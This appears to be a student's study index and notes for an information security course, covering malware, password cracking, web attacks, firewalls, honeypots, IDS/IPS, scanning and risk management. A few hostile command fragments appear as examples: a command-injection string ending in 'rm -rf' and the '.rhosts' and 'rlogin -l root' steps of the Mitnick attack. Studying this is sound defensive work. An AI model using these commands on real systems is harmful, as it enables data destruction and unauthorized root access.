SQL Injection                  2   262
absinthe                       2   263
blind sql injection            2   263
SQL Injection defnense         2   264
cross site scripting           2   265
XSS                            2   265
cross site scripting defense   2   267
blacklisting                   2   268
Whitelisting                   2   268
wep applicaiotn monitoring     2   270
Defacement monitoring          2   270
Availability monitoring        2   270
Performance monitoring         2   271
Latency                        2   271
throughput                     2   271
HP sitescope                   2   271
log file monitroing            2   271
http 400 bad requesst          2   271
http 403 forbidden             2   271
http 404 not found             2   272
http 500,501,503               2   272
Bulletin Board                 2   272
web- cracking tools            2   273
Stunnel                        2   273
Brutus                         2   274
Achilles                       2   274

libwhisker                     2   275

nikto                          2   275
firefox add-n-edit cookies     2   276
firefox tamper data            2   277
webscarab                      2   278
White box test                 2   274
black box test                 2   274
Whisker                        2   275
2
2
Notes

risk=threat*vulnerabilites
CIA !=Disclosure,Alteration,Destruction
C=pharmaceuticals,I=Banks&financial inst,A=E-commerce
primary threats:Malware,Insider,Natural disasters,terrorism
Weakness in the system,(known,unknow,zeroday)
Uniform protection,protected enclaves,Information Centric,Threat vector analysis
all part of org receive equal protection,vulnarable to inside, weakest
Segmenting ur network,many Vlan,VPNs, firewalls
Identify critical assets and provide layerd protection,the center is ur assets ,then it is protected by diff
layerapplication,host& net.
threat requires a Vector to cross the vuln, shutdown it . Ex USB,Auto answer modems so disable it

is SW that written with malicious intent to perform action without usr permition
malware that replicate from PC to PC
malware able to replicate,is parasitic it must attach to another program
must be attached to other program(Need a container)
ability to put it self at boot proccess to load at startup
using instructions that can be interpreted within application (Word,excel )
attach itself to existing prog (.com,.exe)
attach itself to existing prog (.com,.exe)
Prepending at start of the program,Appending at End, Overwriting a portion of file
write themselves to blank or unused areas in host files
affects exe only


can infect boot record as well as program file can spread across the network
no need to attach in programm

Availability attack(DOS),use hole in unix sendmail prog&fingure daemon
Ramen,lion,
Web defacment&mail pass to attacker,RedHat OS use hol in file&printer sharing services
open root shell&trojaned version of SSH,can't clean,use vuln BIND name server
DOS Attack,use UDP Port 1434,exploit buffer overflow vuln in MS SQL server&MSDE
microsoft desktop exchange
W32,infected systems and their backup,systemrun slowly and shutdown
W32,infected systems and their backup,systemrun slowly and shutdown
vuln in MS server,Brute force passwords,infect removable devices with autorun script
patch,DID,network patition


mapping the network,conduct vuln assessment
ex:spyware(trojan,keystroke monitor),vuln in:activeX,java applet,java script


destruct data,leaking confidentiality,backdoor,
destruct data, activate every 26April overworte data on HD
destruct data,activate every 26April overworte data on HD
info leakage ,send doc by mail to attacker
info leakage,send PGP private key through FTP
info leakage,obtain info from victim sysytem registry send it though ftp
backdoor,scan for infected subseven trojan,authen it using master pass,remove it
used as channel that worm use to comm with its creator
removable media,E-Mail attach,web browsing,network vuln,instant messs,peer-2-peer
infect solaris&MS buffer overflow attack in vuln in sadmind prog.
possess multiple propagation vector ex Nimda
worm, works to increase no of infected systems.
messenger ICQ

compromise myDoom infected machine ,remove Mydoom and terminate antivirus

peer-to peer worm
peer-to peer application
activity monitoring prog,Malware scanner,file integ chk,stripping e-maill attach,patch
Scanner,Activity monitor,integrity chk

behavior blocker

searches on files looking for malicious-looking code routines, don’t dep on signature
searches on files looking for malicious-looking code routines, don’t dep on signature
make integrity check
make integrity check
tool use signature and behavior to examin network traffic
tool use signature and behavior to examin network traffic


What to do
protect info,people,org,
what make their job easier,executive:language of money
the Idea behiend the prand, what customer expect from u ,way we want people to view us
look into mirror,what security looklike now
more security benfits,but more cost and sec staff
more informal but high risk




Information security standard

defines the acceptable or appropriate use of org.IT resources
policy(who,what,why) procedure(how,where,when)
policy(who,what,why) procedure(how,where,when)
is directive that indicate decision to follow toward object
Step-by-step used for operation,Mandatory
 H/W and S/W related, more specific ,mandatory
more specific implementation -specific technical details- than standard , compulsory(mandatory)
suggestion (recommendaion) ,not mandatory, assist
Ex. User authintications, password policy , acceptable use .. Etc

SMART+5Ws(What,Who,Where,When,Why)
Specific,Measurable,Achievable,Realistic,Timebased
is process by which org formulates security policy based in ISO17799
Program Policy, Issue-specific Policies, System Specific Policy
high level,provide direction for compliance with industry standards such as ISO,QS,BS,AS
password procedures,internet usage guidelines,not boarder than program policy
specific for each system

what the problem you try to solve
provide guidline for appropiate use of org resources
who apply policy for and what systems are applicable
termination,Reprimand
termination,Reprimand
NDA and Copyright
protect(senstive info,confidentialit,both parties),legal doc must be clear and reviewd
protect(senstive info,confidentialit,both parties),legal doc must be clear and reviewd
Intellectual Property:
Copyright:
digital millenium Copyright Act
point of contact
BCP & DRP
Plan for emergancy response (DRP&business resumption plan),Restor business aftrer disaster,long term
impact to business does not just involve IT but all levels of org.
refer to actionable plan that coordinates efforts to restore org. to normal working involve all level of org not
only the IT, covers the tacticals of recovery of IT systems.
Recovery IT System(data center,business (operation,location,processes)),tactical thing


plan for worst hope for best
have to sites to cover one another in case of desistar
have to sites test patches in one if work well make it prim and the other backup which will test another patch


Assess,Evaluate,Prepare,Mitigate,Respond,Recover
determine MTD (maximum tolerable downtime) ,evaluates the effect of disaster over time
how long can ur system be compromised without effect company
project initiation,risk analysis,BIA,build the plan,test and validate it,update it,approve




Many area of IT
the creator of the data,or who has the authority of data like C-level
the admin resp for managing access
create modify delete
monitor unsuccessful login
top secret,secret,confidential,SBU,nuclassified
senstive data and shouldn’t released like social security num
who you claim to be done by Authorizatio,Authen
something you(know,have,are), some place you are(consol)
what you are auth to do and has access to what,least priviledge
auditing ur logs
password
Token
biometrics
GPS
least privilege,neet to know,seperation of duties,rotation of duties
least privilege+more restrict by time
DAC, MAC ,RBAC, ….
optional,usr can manag it ex usr name&pass,user can give pass to another without admin perm,
 usr must have clearance to access data and usr cant givre it to other ex SELinux, require a lot of work to
maintain
assign user to rols or groups based on their function
action based on rules for user (subject) operating on data (object)
associates user and their privilge with each object
associates alist of object(data) and their privilge with users
account administration,maintenance,monitoring,revocation

log on once per day,allow centralized management using LDAP,AD,Kerberos
TACACS,RADIUS
Weak ,send pass in clear txt,can usr hash it before sending but still weake
use challenge/respone Authen,randome challenge,never send pass,
TACACS,RADIUS
TCP based,CISCO Property--TACACS+
UDP based
TCP based replacment of RADIUS
use Kerberos V5 don’t send pass through Network
use Kerberos V5 don’t send pass through Network

divid authen to domains,make trusts between them,Authen once/session
for encryption, not recommended for passwords
MS
it is used for detecting algorithm used to generate instance SW
one way hashing ,one way encryption
one way hashing ,one way encryption
how hash authen is done
offiline process to guess password given password file info
offiline process to guess password given password file info
dicionary attack,brute force ,Hybrid, precumpution brute force attack(rainbow table)

quality of algo,key length,cpu cycle,ch set support,password length)
dicionary attack,brute force ,Hybrid, precumpution brute force attack(rainbow table)
find (user id,encryption algo,obtain enc pass,create list of possible pass,ec each pass in list,see if match
fastest method ,countermeasure(policy: writtenrules,filter: technical mechanism)
Hello==he110
alwayes recover password but it matter of time
pre cmpute hash store result in DB ,Rainbow table
hashed password
attacker,admin:recover forgoten pass,Audit,check filter effective,aid user migrating

technique of cracking rate=137mb/s
emplyee stronger password in hashing
emplyee stronger password in hashing
DES,2DES,BSDI,MD5,Blwfish,Andrew file systemAFS,NTLM password
each mode crack pass in diff way
no sorting,allow putt common words at beganing of the list
use user name and GECOS info,add prev gused pass,faster than wordlist
most powerfull,most time-consuming,try all combination of letters,numb,special char
can extend custom routines worte in c code
can decrypt MD5+salts

$ 1 $ mean it hashes with MD5,Unix saltes MD5
lan man ,14 char, broken to 7 char,no salts , all to upper case
hashing algo,to identical pass will be the same encryption
audit cracking tool
Cain process to extract pass hashes
MS protection mechanism use 128 bit hash
Security Account Manager
It use Hybred attack:Reverse,upper to lower,append 2 digit
user select (all alpha,alpha+num+special char)
use tradeoff time/memory optm withpre-computed table
pre computed hashes ,cryptanalitic
time memory trad off made by philippe
tool:GUI,generate rainbow tables that can be used in cain(MD5,SHA,Lanman,NTLM)
tool:Cracking tool
define char used to gen rainbow tables
tool:generate rainbow tables
tool:generate rainbow tables

strong policy,shadow,one-time,passwd+,Fighting pre-comp attack,protect enc pass
acount lock,complex,usr can't reuse last 5 pass,change pass interval<time to crack
acount lock,complex,usr can't reuse last 5 pass,change pass interval<time to crack
/etc/shadw rather than /etc/passwd
each login use diff pass(Token,chalenge response,S/key)
triggered by the time of the day
not time based,user id-challenge-write in device-resose -write it
pre-compute list of passwds when sys 1st config ,when usr login use diff S/key
PHY Attr Hand,eye,voice,face,Mannerisms(keystroke,hand written,tread)
keystroke,hand written,tread
amount of time it takes to authen using Biometric
False Reject Rate, the percentage of legitimate user falsely rejected
False Accept Rate, the percentage of reading in which the system accepts unauthorized user
the percentage of legitimate user falsely rejected, system fails to accept a genuine user
the percentage of reading in which the system accepts unauthorized user
FAR and FRR are equal
FAR and FRR are equal
the percentage of legitimate user falsely rejected
the percentage of reading in which the system accepts unauthorized user
FAR and FRR are equal
FAR and FRR are equal
the Process by which Biometic initially recorded
sens the heat in the face aused by flow of blood under the skins

pass depend on domian name,server challenge ,randome hash


use Salts,sever challenge,randomize final hash,paas dep on session,domain,usr name

first Aid
one or multiple Events+harm or attempt to do harm
observable ocurrence in system or network(system crash,pkt flooding in net,sys boot sequence Authorized
logon is event some event make incident
jarm or thret of harm ex NetBios scan on unix is threat of harm
Preparation, identification, Containment, Eradication, Recovery, Lesson learned




IDS,logs,system reboots,poor performance,notify correct people,utilize help dsk
assign primary handlr,identify evidence,
isolate and eliminate source of the incident




common law, civil law




SOX,GLBA,HIPAA,PCI
health insurance portability and accountability ACT of 1996
Acounting
Marchants
regulat the drugs




deprive individual of his freedom

reliable,relevant to the case
monitor network or conduct surveillance to gather info
document evidence ,mentain its intigrity
make hashing
tangible item:siezed pc,USB drive,printout
what handler actuallt saw
3rd party testimony -I heard from some one that
Photo, Models, Drawings are used.

competition bet offensive and definsive player
competition bet offensive and definsive player

perception management (Social Engineering) ,malicious code,predictable response


outsourcing SW

Asymmetric warfare, Cycle time, Palyers and roles, indication and warning
small investment has very large effect

time to decrypt info,time bet vuln and patch and release of worm


Syn -->stimuls SYN/ACK -->response
insider,attacker,criminal,terrorists,governmnts,corporstion
insider,attacker,criminal,terrorists,governmnts,corporstion
is to cause harm ,win-lose situation,more valuable to offense-less to defense


derease integrity,decrease availability


Stateless comm.,retriving info.by GET,HEAD,Sending info by POST,PUT

Web server(IIS,Apache), provid I/p and O/P to users ,under constan attack
code and business logic,language(C,Java,PHP,VB),Application server(websphere,weblogic,tomcat,.Net
DB,SQL,Oracle,MySQL
combine the presentation and application in one tier,for small business,difficult to secure
more secure,DID concept
clustring services to increase load balancing and redundancy,more secure than 3-tier
separate data and logic from presentation layer,FW&DMZ,server&DB hardining,HIDS,backup
patching , close(ports,application,default user account),strong password…erc
update,patch,isolate,restrict access not add or drop tables by usr
URL (<Protocol>://<Server name or address>/<Resource Name>
request or response:browser|s/w version,content types,languages&protcols accepted,cache
200->success,300->redurection,400->bad req,500->server error

BAD request(401unauthorized,403forbidden,404not found ,etc),500range:Server Errors or time out
tool like DreamWeaver
take user input ,dynamic (java script)
GET,POST
GET,POST,HEAD,PUT
usr data are appended to the url
does not append any data to URL,it append it to the HTTP header which may encypt




keep track of usr state,created by web srver and stored in web browser
browser store them in txt file in hard disk and it still when the browser exits,have expiration data
stored only in memory,when browser exit it lost forever
tool that can edit in session cookie
tool that can edit in session cookie
provide encryption,identity verification,data integrity,use port 443
provide encryption,identity verification,data integrity,use port 443
can be run on the web server, app. Server, and as stored procedures on data base server
standard for interfacing applications s/w with web server, allwos web server tp pass info(C,perl,pythn)
application server that implements java, java active pages
enhance usr interface,req(javascript,activex,java,flash)
run browser in restrict mode,limit ability to interact with other data on pc,ex applet
use digital signature to assure usr that code come from known source
allow usr to assign policy that offer control (ex-auther identity,source code)
not secure,its contol run with same privilge of usr may admin


run program in the intent of finding errors
can stand with DOS
Separate workplaces, Version control system
track changes of the code and not overlab
before move code to production separate team must test it again
validate usr i/p,initialize var,don’t make app req admin privil,don’t display error,

making code more difficult to follow or understand
                                                                                                      ‫المكتبه الجاهزه‬
SLE,patch Audit every 6 month,vuln scan
SLE,patch Audit every 6 month,vuln scan
define how to mentain security of hosted app,

HTTP Authentication (basic mode,digest mode), Form based Authentication
data sent in HTTP header clear txt,Base-64 encoding
use one way MD5 , data sent in HTTP header
user Authentication sent in HTTP header,Basic Authentication,digest Authentication
use HTML form field to request authen,password sent in clear txt
isn't encrypted and provide no security,easy reversable
will put asterisks rather display password
brute force-account lockout,bypass authen-chk first usr logged,
password,certificate,Token,one-Time Authen,third mechanism

some thing u have,list of pass,
SMS password
cookie,SW or signature,client ip ---ease to brake

u must limit access to ur web site,keep usr out (default pages,code library,disable directory browsing,URL
directory traversal )
default web page in IIS4 made DOS and increse CPU to 100%
have more vulnerability cause DOS

use session ID in cookie or URL query
 in cookie or URL query
sesion id in url->attacker can edit it,hidden or cookie->can use proxy or firefox plugin
make it random or long ,digitally sign or hash it ,provid session id new at authen,make expire time
tools like webScarab
OS command injection,Buffer oveflow,SQL injection,XSS
command on the input form ex kh;rm -rf
command on the input form ex kh;rm -rf
avoid making sys call within application tier,remove malicious char or define valid char
Web attack
Web attack
update,patch(web server and language),run vuln scanner,IPS,validate usr input

tool to make blind sql injection
Black Box attack
validate usr i/p,filter,length limit,access control,don’t display SQL error
poor input validation,include javascript,inline frames,steal cookie,affect HTTPS,HTTP
poor input validation,include javascript,inline frames,steal cookie,affect HTTPS,HTTP
avoid reflecting user i/p back to web site,filter,validate,Translat&encode
filter out bad characters
allow only necessary characters
file integrity (Tripwire) ,performance,logs. Types: Defacement monitoring , Availability monitoring,
Performance monitoring
alrts when unauthorized changes to parts of web application, uses file integrity checker
alerts when site unavailable, helps to verify the functionality of the network and web server.
CPU,Memory utilization,Latency ,throughput
time between making request and seeing result
no. of items processed /time unit
web service monitoring tool.
monitor access log and error log.
some thing abnormal in headr,indicate scanning or attempt to exploit a vuln
usr attempt to load content not authorized to do

server error or time out,
vuln to inputs attacks
Web Browsers, Stunnel , Brutus, Achilles, Libwhisker, Nikto
is a generic proxy you can use to provide ssl capabilities ,can be used to hack SSL web sites
brute force and password guesing tool,windows only
HTTP Proxy (middleman between webserver and Brawser), can negotiate to seperateSSL(server,client)
have a impressive list of CGI vuln, can berform brute force URLs, muck with cookies ..etc, foundation of
Whisker scanner
fined default web files,examin web server and CGI security, look for misconfig, based on libwhisker, discover
vuln in sites,


proxy ,HTTP,HTTPS,cookie analyze,session id detect
Code is open source
Code is closed source
vulnarability scanner,CGI scan vuln
keyword                        book       page

mitnick-shimomoura                    3    4
mitnick-shimomoura                    3    7
Trust Relationship                    3    8
Finger                                3    9
.rhosts file                          3    9
host.equiv file                       3    9
showmount                             3    9
rpcinfo                               3   10
remote login service, rlogin          3   11
rlogin                                3   11
ISN guessing drawback                 3   15
rsh protocol                          3   15
echo ++ >>/.rhosts                    3   16
rlogin -l root                        3   16
information security cycle            3   18
patching systems                      3   19
finger -l @target                     3   20
HIDS                                  3   22
risk management cycle                 3   23
mitnick-shimomoura defense            3   17
malcious code                         3   28
logic bombs                           3   28
trojan horses                         3   28
trap doors                            3   28
pseudo flaw                           3   28
smurf attack                          3   29
syn flood                             3   29
DDOS                                  3   29
TFN                                   3   29
trinoo                                3   29
tfn2k                                 3   29
Fork() bomb                           3   29
physical attacks                      3   30
buffer overflow                       3   31
injection vector                      3   32
return address                        3   32
big endian                            3   32
little endian                         3   32
endian                                3   32
intel x86 processor                   3   32
networking                            3   32
heap memory                           3   32
NOP                                   3   32
low-land stack                        3   33
brute forcing                     3   34
remote maintainence               3   36
browsing                          3   37
race conditions                   3   38
Toc/Tou                           3   38
intrupts                          3   39
alteranation of code              3   40
rootkits                          3   41
rootkits                          3   41
rootkits linux                    3   41
rootkits windowes                 3   41
loadable kernel modules           3   41

firewall                          3   48
firewall implementation           3   48
firewalls objectives              3   48
indication and warning            3   49
firewall benefits                 3   50
firewalls shortcomings            3   51
firewall's leak                   3   51
firewall default rule             3   52
ingress filtering                 3   53
egress filtering                  3   53
downstream liabilty               3   53
screend network traditional       3   54
multi-level screened network      3   54
MySql port                        3   55
statetless firewall               3   56
nmap scan of stateless firewall   3   57
stateful firewall                 3   58
state flag                        3   58
SYN-SENT                          3   58
SYN-RECV                          3   58
ESTABLISHED                       3   58
FIN-WAIT1                         3   58
LAST-ACK                          3   58
FIN-WAIT2                         3   58
CLOSED                            3   58
Icmp error packets                3   59
stateful inspection ftp           3   60
proxy firewall                    3   62
process table                     3   62
personal firewall                 3   64
application control firewall      3   64
kuang2 virus                      3   65
firewall and ids                  3   65
Nat                               3   66
private address space                  3   67
RFC 1918                               3   67
Pat                                    3   69
honeypot                               3   72
honeytoken                             3   72
honeypot                               3   72
honeypot liability                     3   73
relay                                  3   74
resarch honeypots                      3   74
hardened honeypot                      3   75
honeypot advantages                    3   76
honeypot fingerprinting                3   78
honeypot disadvantage                  3   78
honeypot types                         3   80
netcat listener                        3   82
honeyd                                 3   83
honeynet project                       3   85
GenI honeynet                          3   85
honeypot deplloying                    3   87
honeypot checklist                     3   89
LaBrea Trapit                          3   89

R^3                                    3   96
 ROI (Return on investment)            3   97
ROSI (Return on Security investment)   3   97
ROI                                    3   97
ROI                                    3   97
vulnerability axioms                   3   98
threat types                           3   99
vectors                                3   99
response(corrective control)           3   99
threat concern                         3   100
bypassing firewall techniques          3   103
firewall bypassing techniques          3   103
phone sweep                            3   104
modems issue                           3   104
http tunnels                           3   106
social engineering                     3   107
social engineering                     3   108
social engineering defense             3   109
firewall bypassing protection          3   110
legion                                 3   113
Hping3                                 3   114
nmap decoy scan                        3   115
Hping3 features                        3   116
attack history                         3   117
satan                                       3   117
jackal                                      3   117
nlog tool                                   3   117
TCP Finger-Printing                         3   117
worm toolkits                               3   117
sobig worm                                  3   118
welcihia                                    3   118
msblaster                                   3   118
canvas                                      3   118
port scanning                               3   121
nmap                                        3   122
gopher                                      3   123
filtered port                               3   125
unkonwn port                                3   125
nmap scan types                             3   126
randomize_hosts                             3   126
ping scan                                   3   127
tcp full open                               3   128
tcp half open(syn scan)                     3   128
udp scan                                    3   128
icmp rate limiting                          3   128
os finger printing                          3   129
vulnerability scanners                      3   131
Nasl (nessus attack scripting language)     3   134
nessus server                               3   135
nessus client                               3   135
nessus color codes                          3   142
wireless scanning                           3   145
netstumbler                                 3   146
kismet                                      3   148
kismet_drone tool                           3   148
kismet interface                            3   149
kismet color codes                          3   149
war driving                                 3   150
wireless network mapping mitigation
rf-barriers                                 3   151
war dialing                                 3   152
toneloc                                     3   153
HVAC (heat ventialation air conditioning)   3   154
war dialing mitiagating                     3   154
parallel modem option                       3   155
pen testing                                 3   155
pen testing techniques                      3   157
nachi worm                                  3   159
vulnerability false positive                3   161

IDS                                         3   166
IDS - What is IDS not?                  3   167
IDS Technology                          3   168
IDS alerts                              3   171
IDS EOI                                 3   171
true positive                           3   171
false positive                          3   171
true negative                           3   171
false negative                          3   171
network IDS                             3   174
signature analysis                      3   175
nop                                     3   176
anomaly analysis                        3   178
application protocols analysis          3   179
shallow inspection                      3   181
deep inspection                         3   181
IDS - modern ids                        3   182
ids evasion                             3   183
data normalization                      3   183
nids advantages                         3   184
honey token                             3   185
nids challenges                         3   186
nids topology limitations               3   187
network taps                            3   188
NIDS - Encrypted traffic                3   189
NIDS -Signature Quality vs. Quantity    3   190
NIDS performance limits                 3   191
statstical sampling analysis            3   192
NIDS cost                               3   193
TCPDump as NIDS                         3   195
NIDS - TCPdump                          3   195
Libpcap libaray                         3   195
Wincap                                  3   195
Libpcap Products                        3   195
netranger                               3   195
TCPDump as NIDS adv. & disadv.          3   196
NIDS - Snort                            3   198
snort as NIDS                           3   198
rpcinfo -p                              3   199
rpc calls padded                        3   199
snort rule flexibility                  3   200
snort rules                             3   201
snort rules -simple                     3   202
snort rules -Advanced                   3   203
snort - Key points                      3   204
security information event management   3   204
siem                                    3   204
Nids - passive fingerprinting           3   206
Nids - active vulnerability           3   207
Nids - passive vulnerability          3   207
Nids Development                      3   206
ids blade                             3   207
wids wireless ids                     3   207
file integrity checkers               3   211
exclusive log monitoring              3   212
inclusive log monitoring              3   212
log monitoring                        3   212
hids advantage                        3   215
hids challenges                       3   216
hids recommendations                  3   218
hids developments                     3   219
tripwire                              3   220
ISC (internet storm center)           3   222

IPS                                   3   229
IPS &IDS                              3   229
ips -- how it stop attack             3   229
ips -- what is IPS is not             3   230
firewall as an IPS                    3   230
hips details                          3   232
hips                                  3   232
system call interception              3   232
hips advantage                        3   233
hips challenges                       3   234
tco of hips software                  3   234
hips mangment consle                  3   235
application behaviour hips            3   236
hips application behaviour            3   236
hips recommendations                  3   237
hips developments                     3   238
application shielding behavior        3   238
hips -zero day protection             3   238
NIPS - how it work                    3   238
nips deployment                       3   240

nips details                          3   241

zpha (Zero Power High Availability)   3   242
nips latency requirement              3   242
nips security                         3   242
multi resolution filter               3   242
Nips - multi resolution filter        3   242
nips rules capabilities               3   242
nips challenges                             3   243
nips passive analysis                       3   244

nips developments                           3   245

unity one product                           3   245
nips protocol scrubbing                     3   246
nips rate limiting                          3   246
nips to enforce org policy                  3   246
macafee hips                                3   249
IDS plus something                          3   249
ibm iss proventia                           3   249
ibm iss proventia G series                  3   249
ibm iss passive mode                        3   249
ibm iss inline simulation                   3   250
ibm iss inline protection                   3   250
x-force                                     3   250
firewall plus something                     3   251
check point vpn-1                           3   251
smartDefense                                3   251
interspect                                  3   251
norton internet security                    3   252
tipping point IPS                           3   253
tipping point IPS -- response mechanisms    3   253
threat suppression engine (tipping point)   3   253


risk management                             3   256
risk management focus                       3   256
cause,effect,response                       3   257
risk management goal                        3   258
best approach in identifying                3   260
risk analysis matrix                        3   261
risk management steps                       3   262
administritive controls                     3   262
technical control                           3   262
risk managementem phasis                    3   263
risk forms                                  3   264
vulnerability                               3   265
threat                                      3   265
risk                                        3   265
risk                                        3   265
risk management questions                   3   266
risk uncertainty                            3   267
risk assessment (knowledge Vs best practise)    3    267
SLE (single loss expectency)                    3     268
ALE (annualized loss expectency)                3     268
SLE (single loss expectency)                    3     269
exposure factor (EF)                            3     269
ALE (annualized loss expectency)                3     270
ARO (annualized rate of occurance)              3     270
quantitve risk analysis                         3     271
qualtative risk analysis                        3     271
business case Risk management                   3   273,274
business case Risk management                   3    274
Risk manage step1, threat Assess & Alanysis     3    275
Threats Vectors                                 3    275

risk analysis purpose                           3    275

risk analysis matrix                            3    275
Risk outsider attacks - internet                3    276
Risk internal attacks                           3    277
Risk malcious code                              3    279
egress filtering                                3    279
asset identification and valuation              3    280
Risk manage step2, Identification & Valuation   3    280
Risk manage step3, Vulnerability Analysis       3    281
vulnerability analysis                          3    281
risk Evaluation                                 3    282
risk management step 4- risk evaluation         3    282
interim report                                  3    283
risk management step 5- interim report          3    283
cost benefit analysis                           3    285
cost of countermeasure                          3    285
final report                                    3    286
short-term solutions                            3    286
long-term solutions                             3    286
business case summary                           3    287
notes

in christmas 1994,on Tsutomu shimomura home netwrok,informaation securty professtional
shimaomoura has 3 machines runing solaries 1 (SunOS 4)
mean I trust the information and connection that come from another familiar computer (didn't require password)
can return information about users on aparticular system,used for reconissence,service port 79Tcp
allow user to use r-commands,include machine and local user account,without password
allow user to use r-commands,include machine and local user account,without password
list file system on a remote host,NFS file system
get a list of all rpc service and details about them on a remote host
port 513 Tcp, rlogin command ,allow commuincating to remote machine
port 513 Tcp, rlogin command ,allow commuincating to remote machine
it only works with idle machines so you need a machine doesn't accept a lot of connections
port 514Tcp non interactive commands on remote host using rsh command
allow all users to connect remotly without password, "Accept connection from any usr any machine"
,-l username , starts the terminal session on a host
consist of three parts:preventation,detection,response
mitinik,timely patching,before or after the exploit
all information about user,hme dir,shell,mail status
 distrubtued as software agents that can be monitored from a central location for large enterprise
consist of three parts:preventation,detection,response
detetection,patching,disable unused services,network vulnerability scan,HIDS,NIDS,firewalls
logic bombs, trojan horses, trap doors (backdoors)
small programs or sections of a program triggered by some event as a date or a time
helpful entraintaing programs that perforam actions user didn't intened
are bits of code embedded in programs by programmer to gain access at a later time (backdoor)
thing that looks Vulnu but they acts as alarm or trigger actions if an intruder attempts to exploit the flaw,not a
honeypot or honeynet
spoofs a victim ip and send echo request - broadcast - to a nwtwork
filling a victim buffer with a lot of syn
attacker recuit zombie tools TFN,Trinoo,stacheldracht,tfn2k
a DDOS agent
a DDOS agent
a DDOS agent
DOS attack ,cal fork() to create a new process like the orginal,done repeatly
someone has a physical access,can shutdown
used to excute a code on a host,no boundary check for the inputs
an excessive content injected by attacker to overwrite the return address by address of his own.
the point by which the inserted payload is able t control the cpu or crash the program
the most significant bit is on the left side of a byte x00000000 ex. (Ip networking)
the most significant bit is on the right side of a byte 00000000x
which part of a byte is considered most significant,big endian left,little endian right
little endian you have to conver to big endian in network connections
all connections in big endian
is used for arbitary large buffers ,resulting pointers are called procedure,hard for buffer overflow
No operation instruction can be used to reach the payload
starts with 00 in address,would indicate windowes box,limit size of payload
an attempt to gain access to system by bombarding it with possible guesses until the correct one found
allow administrators into a sytem to troubleshoot a problem remotely,GoToMyPc
can reveal sensitive information useful for attacks
exploiting the diffference between a security control and the time of applied service
time of check:check the security, time of use :service time,race condition attack
calls for software or hardware needs to be handeled,an attacker can use it to call malcious code
comprimise the integrity of a program or data,create backdoors,virus,worms
subvert kernel, process management, file access, security and memory mangement functions
cracker tool is insreted stealthily into the local OS and subvert it
loadable kernel modules under unix are called device drivers files
using microsoft development kit for win2003 server
are called device derivers files used in creating rootkits

ccontrol what is allowed across some point in a network as a mechanism to enforce policy
dedicated applience, hardware or software into network device, software on a computer
reduce risk,increase privacy,enforce security policy
a technique to determine what the attackers are going to do before they do it
reduce risk, increse privacy, filter communication, encrypt communication, records(logging), noise filter
dialup,vpn may bypass,organizaion may only depend on them,attacks on application layer
the attacks that bypassed the firewall
default allow restrictive,default deny:permissive
a filtering is applied to incoming traffic,most of firewall rules applied to inbound traffic
applied to the outbound traffic,very useful as intrusion detection system,virus trying to connect
means to try to protect other by filtering your outgoing traffic
design a network to trusted and untrusted zones,dmz ,risk to be comprimized
allow limited acces from zone to a previous zone,colors,
TCP3306,web server connect to this port to query data
low end,very fast,can easily be bypassed,if ack is set existing connection
used to know firewall rules,if nmap port give a rst/ack allow,if no response deny
track te progress of the connection,no inspection of data is performed
identifies the relationship between the source and detination address
first step in three way handshack
Second step in three way handshack,syn-ack received
third step in three way handshack
a host want to terminate the connection
the other host received the fin and acknowelde
both side finished communication
no connection between two hosts
issue to state firewalls because a legal packet can't pass,udp-->port unreachable
stateful firewall can track the ftp ,h.323 SIP connections
slowest,inconvient to mange,traffic regenrated,painful in large organization
proxy firewall use them to keep connection straight
software residing on each computer
most popular perssonal firewall,have set of rules for applications
all infected systems listen to the 17300 tcp port
using a log to know there is a virus infection inside your network
network address translation to address in rfc 1918
10.0.0.0-10.x.x.x , 172.16.0.0-172.31.x.x , 192.168.0.0-192.168.x.x
Private range
transilating traffic from multiple internal sources to a single external address
is an information system whose value lies in unauthorized use of that resource
a single file with special attributes
dedicated server,state machine,service,virtual server,honeytoken
civil issue,attacker may harm othe networks from your honeypot
when attacker break in a site and uses it to attack other sites
weak,unpatched,vulnerable,host trap,tactics,motives,tools
to differentiate between legitamate traffic and illegal,anyone connects to it is attacker
insight (tactics,motivs,tools of attacks), reduce false positive,false negative,addiitional DID
attackers use the identity of a honeypot to throw off admins by spoofing traffic from legal to honeypot, feading
honeypot with incorrect info
fingerprinting,limited view,resource buden
purpose,location,scope,interaction

can design any honeypot as a sepecific os,using nmap,Xprobe database


start with low-interaction,unused address space,monitor honeypot out of band

Honeypot tool

reconnaissance,resource protection,ROI
the financial benefit or return received from a given amount of money or capital invested into business
like the ROI,specific for security
ROI=(gain-expendenditure)/(expendenture)*100%
for evaluating to go ahead or not in the purchase,for perdicting revenue
5,Vuln are gateways for threats, little scanning little removing
worm ,virus,employee emailing intellectual property to a computer
outside attack,inside attack,attack from malcious code
the countermeaasure they use to fight threads once they are found

worm,wireless,modems,tunneling,vpns,social engineering,home laptops
worm,wireless,modems,tunneling,vpns,social engineering,home laptops
commercial war dialer,scan range looking for modem with auto answer
auto-answer,bi-directional connection,connection to external isp
p2p programs use it to send data,stunnel can be used for this,port80,port443
describe an attempt to manipulate a person to provide information or acces to information
human based: urgency-third person authorization,computer based: pop-up windowes,mail attachment
policy,procedures for granting accesss,educate user to report any malcious activity
audit,proxy firewall,IDS,Ips,educate users on social engineering
can detect unprotected netbios file shares
like ping using tcp crafted packets, used to assess firewalls
use diiferent spoofed ip address to scan so it hard to detect who is the hacker
test firewall rules,net performance,fingerprint os,audit stacks,transfer files,check if a host is up
from 1995 to 2009
first vulnerability scanner
uses syn/fin scans to evade firewalls
provides aweb based interface for database for analysis of data

non programms can make worms of any vulnerability
most prolific e-mail mass mailer,aug2003
                                                                                                   Aug-03
                                                                                                   Aug-03
exploitaion suites started in 2007
scan 0-65,535 twicee one for udp and one for tcp
queries open ports to attempt to know which application is running on port
port 70 tcp
might be listening but nmap can't tell for sure
is not-well known port so nmap can't tell what running on it
use hostnames,wildcard,ranges,cidr notation,combined
little more difficult to detect,random selection of ip range
tell you which machines are up
default scan type for unprivilged users

nmap relies on receiving icmp messages,slower than tcp scans
set limits on how many icmp packets they are willing to send out during a certain time
nmap signature to identify different os.
scan your own systems,scan,report
nessus attack scripting language used for writing plugines
run the actual scans and send results to a nessus client
can run from different machines,control the scan process
red=critical,orange=moderate,yellow=moderate low,gray=low
passive or active,netstumbler or kismet
wirelss active scanner,retrive: wireless channel,access point mac,ssid,signal and noise level
intrusion detection tool,wireless passiv scanner,attacks against LEAP protocol
lightweight kismet, deployed in client/server infrastructure to monitor wireless from attacks

green=secure,red=factory settings,
is driving with the equipment to detect wireless networks

metal-screening inside exterior walls to reduce wireless signals
identifying systems with modems sitting inside the network
